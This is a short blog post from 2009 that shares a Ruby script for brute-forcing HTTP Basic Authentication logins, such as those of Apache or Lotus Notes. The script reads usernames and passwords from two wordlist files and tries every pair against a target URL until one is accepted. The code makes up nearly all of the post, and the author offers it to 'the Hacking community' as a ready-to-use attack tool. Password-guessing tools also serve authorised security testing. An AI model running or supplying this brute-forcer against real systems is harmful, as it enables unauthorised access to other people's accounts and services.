#!/bin/ruby
require 'net/http'
require 'timeout'
print ("
Basic Auth Bruteforcer
----------------------------
Usage: #{File.basename($0)} url uri
")
if ARGV.length < 2
$stderr.puts("Usage: #{File.basename($0)} ")
exit
end
url = "#{ARGV[0]}"
p url
uri = "#{ARGV[1]}"
p uri
username = IO.readlines("user.txt")
password = IO.readlines("password.txt")
resp = href = "";
begin
http = Net::HTTP.new(url, 80)
#http.use_ssl = true
username.each do |user|
password.each do |pass|
p "trying #{user.chomp} with password #{pass.chomp}"
Timeout::timeout(3) do
http.start do |http|
req = Net::HTTP::Get.new(uri, {"User-Agent" => "wget"})
req.basic_auth(user.chomp, pass.chomp)
response = http.request(req)
case response
when Net::HTTPOK
p resp = response.body
when Net::HTTPUnauthorized
p 'Unauthorized'
else
p 'error'
end
end
end
end
end
rescue
$stderr.print "Connection Failed: " + $! + "\n"
rescue Timeout::Error
p "Problem Connecting"
end
Friday, July 3, 2009
Ruby Brute Forcer for Basic Authentication
Hi everyone since I've just started my coding in ruby, I'd like to give the Hacking community a small contribution.
Here's a ruby script that given two files it attempts to brute force basic authentication login, like those of lotus notes or apache.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment